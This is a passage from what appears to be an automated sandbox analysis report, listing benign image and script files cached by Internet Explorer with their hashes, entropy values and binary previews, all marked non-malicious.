                                                                                                                                                                                                                  Preview: var otTCF=function(e){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function n(e,t){return e(t={exports:{}},t.exports),t.exports}function r(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return I.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return L(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAKp8YX[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):497
                                                                                                                                                                                                                  Entropy (8bit):7.3622228747283405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                                                                                                                                                                                                  MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                                                                                                                                                                                                  SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                                                                                                                                                                                                  SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                                                                                                                                                                                                  SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=K.A.}{...3E..X.....`..S.A.k.l......X..g.FTD,....&D...3........^..of......B....d.....,.....P...#.P.....Y.~...8:..k..`.(.!1?......]*.E.'.$.A&A.F..._~.l....L<7A{G.....W.(.Eei..1rq....K....c.@.d..zG..|.?.B.)....`.T+.4...X..P...V .^....1..../.6.z.L.`...d.|t...;.pm..X...P]..4...{..Y.3.no(....<..\I...7T.........U..G..,.a..N..b.t..vwH#..qZ.f5;.K.C.f^L..Z..e`...lxW.....f...?..qZ....F.....>.t....e[.L...o..3.qX........IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAPwesU[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):777
                                                                                                                                                                                                                  Entropy (8bit):7.6388112692970775
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:+7lA8BoZmceXqKpNkTxSdmeGt0VLQT2NA2LTBixN:oVoZBn+aFQmFCV8r2L10
                                                                                                                                                                                                                  MD5:A89DEB9BD9C12EE39216B4724EF24752
                                                                                                                                                                                                                  SHA1:F3410A1069610A57CA068947F1A77F73B9B20FDA
                                                                                                                                                                                                                  SHA-256:7438061CAC6A152A15BD67057926404DB423936B22635A1902B0BF54C4B14464
                                                                                                                                                                                                                  SHA-512:4065BD6D0C141DF2AB3C4CF0AE2C0D87530363EC2CAFCF47493F8CA69025C8613B2B77065924F49AFE4C810A7D6DDD14DFCB3E69274EC7D167382D24806F70B7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.{L.q..?.s.]uq.H..)QV.J......56.f.l..iXn..0.[6L.%L.ki.,.)V1b.J.SgrKg....9o....{....~..s..1.z........J.44w1..Y.7;..c>.W..u.O..d..vE.[2.9_....pN.].......J......].D.....Q@g.w.[.q.mC.b..b.,..s*.O^~$5..oK3qq.%9&.....{PK...kf..S..d..%.....[....)*.fSb(*!....Q..C.;k.....-.;Ab6E..0...Nb....,.C...A...IG...5.&Q.......5....J.......LC.._.}..VA.....rJ....h..&.LDQP.cA.'..3qsu.d2">r...%1:.PA.k..c8Ak.W^..s ._/-.n=.~#VV#d...\............B.<.{..Q...}.{k..._.E.B,..O.......b6...p......L...*......>....m.j?.R..3.OP...g._.f6..?...._N...l..8......r..rhG....i.8%`.@........]...%*|..........T?.k[u..`/6&.r.P2..k...ZG.._....I+.HX.....d..R..&...9.....be_&...y.|".z)...lGv..a.....zE.|..s....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AAQby46[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):363
                                                                                                                                                                                                                  Entropy (8bit):7.158572738726479
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmo4mUMeAcyo60p0DbmaEqs2WQ5xTJp8ub7rvz81qBI884CUq109LaP/U:6v/7N/Nqf0m/WqxHfq6IHhUuHU
                                                                                                                                                                                                                  MD5:2F9F3CB5388BCD08347366720CE5D288
                                                                                                                                                                                                                  SHA1:A39BAC27D57324389B7B65180D231A9030494616
                                                                                                                                                                                                                  SHA-256:8E87ACBF78E18EEF07524A2EDB0100BBBF77213CC16227046411F1EEBB6727F4
                                                                                                                                                                                                                  SHA-512:FC26F4E0B2B8FDDFEE5657C9425FF0F8C6E2CFF0B8144E3DA597DBA15CA28CE2B10113967B3DE61DD137C6AE384199A03974761A5382FEA93BE250EF9217C2FD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..1..@..?........i.."n.s.t..*..g.:..b...m..^AR..Z..M. l...d.........3........Z%}......Ox..z,.r...1.. ....!.Y.q8..}..p.jb.^s:.(....v.M.E..{..#....L..g0.p..H....p...*J.M.m[..Z-.T.-.B...<..Z.l..)b.X0.....j.r.d2....0M.].a....3. ....a....L..76....EN...5T5}.......'..SZdb...g....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARjTo7[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19356
                                                                                                                                                                                                                  Entropy (8bit):7.948589080765709
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:NMaopAB0BYWomk1sj2+Y9+ei8azWV7BVDnVOcvfKuNqs8KmFE5bsDRkeuWTMrX0:NMP+xtNu2V9+rt+dVnVt3KuZ8dG5bsm8
                                                                                                                                                                                                                  MD5:FF1D15E36A45BA83633203F3B7E2862A
                                                                                                                                                                                                                  SHA1:5008B7735E8052005CE52C52C3DAFF40FAEB8F23
                                                                                                                                                                                                                  SHA-256:860A18697195EA174D2B23E29AB5DA22F4B9D10616209F17AEE699E8F705FC3A
                                                                                                                                                                                                                  SHA-512:6EC39298F2D7F078163472582ECCC8F99914DEBEF70A3D47BB5F05BB99A5FB0619DDAD71E24DA4F7822F3868FD1E213C1B27AAB020B6A28DE53CC70BD710DF3C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...3g.....J.jC..,6.`M......k..h...............wc..........."6.. ...@..|..M !.b....S.=...&...5.w<9....$G....Q{.CL..K...!.ce....!.w.:T.B...(..(_.p.J..7..R..K...3I....?..v.z..*...r..|......E....L......2%...Fi.j+W......a..\..bF.J....`-.k......03.W..g..1.....I....i.y....<.Tg9....10.0=h.*..=..2RU.....o..`L..3......cd#..",3..R..r..@.].2(.....`..+...........K.WQ.I.'.J.n|..Z.Z..^
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARl0hy[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3256
                                                                                                                                                                                                                  Entropy (8bit):7.8663108680757885
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:QfAuETAN9spRjqf01fg9c1BYEo9Mx0F/bjc44qKCGCK1+sBUsKsXMiTkE+ON:Qf7EBjk2QcE+09444qKPTMsBUtu9xN
                                                                                                                                                                                                                  MD5:A16117A702AA2CC7125970EA7171DB1E
                                                                                                                                                                                                                  SHA1:9557FB5F76D277E72F18B2238E83B8DB03B13C80
                                                                                                                                                                                                                  SHA-256:B21617317A24495B6DE7B6F7F63D76F6D04F57338A2F92A231B93FC194425CF4
                                                                                                                                                                                                                  SHA-512:E48625587E710FFDB0F218DCDDF47CF38A658B215909B466F8C3B3713A44CE29A513FC8526A08756ADE6703D235AFE32CA2DBE63BD078AAC5F1E1E337A5F4FDA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..]B;g.$m...SH...SW...~=.}.K.R..;i.h.....5i.\.;....I..E.....I^v......'<z.Q`*.U.6C#.+?h.=.....p..YK.d..*...7k.......w).h.....v\....l...E..]Y..V.6.y*.L.....4....[.!..t....n...Rk.{8v9}^"o.Q...q.v...,..wWV...9.sF.1....[.m......Q]..Q.?....n.y?Z.GG....rz.........B..../....LF`o).M.B.....F.lT.]..(..A..hwA..."....1.^f$...........$.c...q...j..N.%.=...MF..B...x..'..WE&..[..B~.Y.....F
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARlJ4T[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                                  Entropy (8bit):7.760174772862359
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:QfPEZqYfRLkxSMv2xALkOi62L40YjzQ6EeICCOXb5msxY9AYm1f1OLjj+Ygy:QnteRQEQ2aLkLpLpYQ8HCOrtYk1Orlx
                                                                                                                                                                                                                  MD5:03E41B958B2CE9B85DF99739D9BFB1BD
                                                                                                                                                                                                                  SHA1:94AD4724995A11494A4C451B22F64433A632244F
                                                                                                                                                                                                                  SHA-256:9DB5B13FD53FDB6194508D8165FB4398E5C30056821F1F3BF05714C6AF002803
                                                                                                                                                                                                                  SHA-512:0A45D3A5CDE8D0C2039A536A6CE91C832BFFC5859C484160B74DF353D1319AE2FEBD30135C565C500AD4E85295676630E10C371E42C8B8999A67897E3B15E37F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..jJ9?.LG.;.3;0......i3.....4d.T..5Dh...i1!%.*.&...k...)..[....'...P...,.ay.8...T.uQ~.DrG.!.*.4K..[]..X..s..Z.!.l......J.R.....q...b.f0O...@..,ct..@.7c;b\.j.l.!.....2....L.".a.z.3....!.H.1..j.h..5..I.\.e.#.NEh.%...1.&....(z.V6..n....F...).XA...^5.5R&F.K.U...t.6j.,...-.-...P.@..-.....9?...N..c3.............v.8.....t*.I..\....Sk...+Zi.).7~.`e*...m4.6....ev....1.".E.}....q..(.n.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARlMfv[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7448
                                                                                                                                                                                                                  Entropy (8bit):7.523123834449348
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Q2/VSRNE77hResniHAR0f98TCMcXg4xXKRVmv9jUP6RVEfH8Z:N/VSRM7/iHAR0fmCBTXwVmFbRqvi
                                                                                                                                                                                                                  MD5:0EFC457805D9933D79528CBF37B6CF87
                                                                                                                                                                                                                  SHA1:6A893F0CD657D76B1802882F8539C52DD005FAA0
                                                                                                                                                                                                                  SHA-256:F0C6D41D0FB2C506180994702FD0A3E54864D77ED329170A2C0E54F8F527F986
                                                                                                                                                                                                                  SHA-512:1B079B3C0E4E0F838B3F7AD6BC5744C5263C654C8DF044DEDD30C67BBDB3EB3C9A4A0920942D42DDBC46A004102C45D4808D04BB9725E1771C231102B3939A29
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....@.....(....p...A@.@.8....M.j\.Q .I../=...PA.....w.b..*FH.@....S...dg.Rd4>.!L...@.@..%.%.-...P...%.-...P.@..%.W.1h.h.E0.P!.....@.....@...+K.N.J..h...$.(.4...S@..J.....1....R@.zP.....{P..c......M..i......EZw!..@.........P.@....(.(......(....+.......LB..Q@.(...(.zP.i...J.3H..T.(...^....M0...3@...@[..0X..4!.v....C.9|.....?(.@.}.$...m....8 ..2...D....4.P.P.@.....(......(...).Z.Q@..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARlt06[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2055
                                                                                                                                                                                                                  Entropy (8bit):7.737309048781414
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:QfAuETATOZXYbfiGBRwjR56tjU2peON9yCL1Hj5TkLmzf8R:Qf7EZEiGBGjb6nJHVwLmz+
                                                                                                                                                                                                                  MD5:E36D48C9B814F0634087018C06CC9B22
                                                                                                                                                                                                                  SHA1:B55C96D89E02F7CBEE7CC2731ABE30C73DE25B11
                                                                                                                                                                                                                  SHA-256:B5AFC3D4C19BD12F278AF96F3CCC83F31F7B78A4679FED541368C67D3477156F
                                                                                                                                                                                                                  SHA-512:E39BCB00B232CF416D948C4FED41201A064B88B5238C91BCB2EF1B225CCB49DEE10E11C08EC035A161A1E85529C4C0F4F89FEA77E27DFF9599130E39F2E51CC1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..^.+..-#3...P..H..&N../cf...#..m..lq=.h.N.3.b..%......d.I..;z..A .:....p.......U.c..h.H...7vs...~m...3@.s`.u..n.T#$........i.P.FpQ.........q..%.:sUv..f.$.>....%g`.!h.....4...Y......6.........)\.H..x.X$Y#n.. ......P.P.)-..$7V..$}@.Eq=N...Y..$2J.V..i-......`L.;.j.'c...5.N....[.OqZx.....q. ...q^5.mI,Q.....W?.1R.h.>.....t...H.+.Ue{#..!.y....z.X...n..s..>.;.Nz.Qz.C...`..BP...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARluon[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10779
                                                                                                                                                                                                                  Entropy (8bit):7.939187885825493
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QnoyuXFXlAZMX+FScbZNTpJSFKeg+OG14uYlSeR9olYsbqVu0Xj2:0onVsMuF59UFKepZYhjvXj2
                                                                                                                                                                                                                  MD5:2FFFD594494C78F318CC351DF07DC03B
                                                                                                                                                                                                                  SHA1:37628AEF2493DD8416FEB90CA0FFE49436B07A7F
                                                                                                                                                                                                                  SHA-256:FE623CDC070C20588BFA3A26460A8C1749B9C1D3C7B51FED903764A52B6E97C5
                                                                                                                                                                                                                  SHA-512:600B470023EBF559155CCCCD9409F018F5B31F8DE44A5A3419C5C8BDA2CD8CFF447BCBCD10D4876AC3BD9D927F4126BDBDA91F3E9E6A1E15CF370FC16B586365
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....m.."z...e..I..7...U....v&..R&X.....zLd.. ln?.+.v.rFX....H./.a...z8?CW....}>9.H.....C...E..#d...%rpG..Rb/..ih.3C...Rx..|.J....}8.C...]O...kc..3..'...~t....kY....:...8...(.9.h....*W.U..l.'..ey..V....o.....}z.(.W*..x.$J`..P..@..@..@..18..P..W...q.&.....r*.EH.a@...d,.....B.@.....-.*..ZD...W+..w^.......6.....M../..d...>..~..,.*M....7..&..H.~S.9.3F.P#f1...ek./sn......fK.....
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\AARm0KA[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11354
                                                                                                                                                                                                                  Entropy (8bit):7.8268113059951805
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Q2B4m3VCxzol0Y6kvVscOTDBYgq3cmvgJk9otEulVDEfP3bvcklu0W:NBZtGHk9srXBY1Y69otEUVAfP3bw3
                                                                                                                                                                                                                  MD5:E5E77739AB15FD9F2FD5F6CB7291679B
                                                                                                                                                                                                                  SHA1:E6DDB01B76F08F4DE66987FE684FD97035F3E76A
                                                                                                                                                                                                                  SHA-256:7A58AA74472C82670FFB68F862378376B3DF5B3FC83DB2094B254595AE2890A2
                                                                                                                                                                                                                  SHA-512:409D424364D532368B0BA2323362C6F9431DFFEC7927445AA699257A38C07BE50F0B6AD0BD1E8BF50D6534FD3FE5E5997A626916130CEAFD7A5CADA0DCEDC8B8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...@-...P.R....P.)..@...Z.Z`....B(.....!.P.M.%.....P.(....0.....b..4..H....(...8.`.(.qL.S.....(.).P1(.4......:....L....!.....@.4..@.@.4.(.P.(.E...)..h....mU$.P2O.K.epW. .[)c]..RN....(..-.B..wt..4....r)..P...P)..(..i....i.J@-.-!.@.............Z.(.h.........H...@.....Bb........q@....du....p.9.+.#N-.I.$HY...;Qq....9:1qo#..q.....5...0e......a@...q.)....e.H..+...N......#.f....1.a..@n...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB1gyTJJ[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28511
                                                                                                                                                                                                                  Entropy (8bit):7.874084579228965
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:IdcJzEVd5QwJjGbC3WOQlHASZt8AiNw4zkb5Aj:IA0d535qCmOQlHASEpw8ki
                                                                                                                                                                                                                  MD5:4DF8DD6D0F07C93CF4BDAB709C312993
                                                                                                                                                                                                                  SHA1:3D7987EF7E126936328E337FD3A8E06485C4BB2F
                                                                                                                                                                                                                  SHA-256:CF09AC32AAE02628FDF2FBDFC551BC13E68F2B3365E4EF52B36B35825624BFBD
                                                                                                                                                                                                                  SHA-512:7BC4F8719307F5F05E86AEE0EDDAFA947CD9379036148A311A857A134E955AA228E5094410E4B9FF01047B093EE8FD953E47FAD819BA310466F3864CC9F16A13
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..8.W.<.fd ...|G..1.A...d..f....=.o.M.$Y. ..E.<...\..w."....Q.(.......n..~[2.........m.uCc.A31.u..h...s...&J.......8.zP.{.q..K).g.?(..Z..)K)$...:......=0i.y.......i..w..n...._p,S8_j.....U.j.oA.....NZ..(c. {..........<..>J...ZB.UYK1.....A.G.@...8<Re#:.DKb.~~....30..T...*.#..L...y...v...(.'...1.zt.....`7......P....@.y.W.w..7U.F.O.jJE{..c........@..-..P!.`..J`........q@..Rw....
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB7gRE[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):501
                                                                                                                                                                                                                  Entropy (8bit):7.3374462687222906
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                                                                                                                                                                                  MD5:1FCA95AEED29D3219D0A53A78A041312
                                                                                                                                                                                                                  SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                                                                                                                                                                                  SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                                                                                                                                                                                  SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...|.~.0hv..S..7.....YBn..B..o.T<.........|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[3].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):204
                                                                                                                                                                                                                  Entropy (8bit):4.753212018409155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
                                                                                                                                                                                                                  MD5:AA0EC763639C9094D9BE1B0D491AC65A
                                                                                                                                                                                                                  SHA1:9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
                                                                                                                                                                                                                  SHA-256:4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
                                                                                                                                                                                                                  SHA-512:9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[4].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):204
                                                                                                                                                                                                                  Entropy (8bit):4.753212018409155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
                                                                                                                                                                                                                  MD5:AA0EC763639C9094D9BE1B0D491AC65A
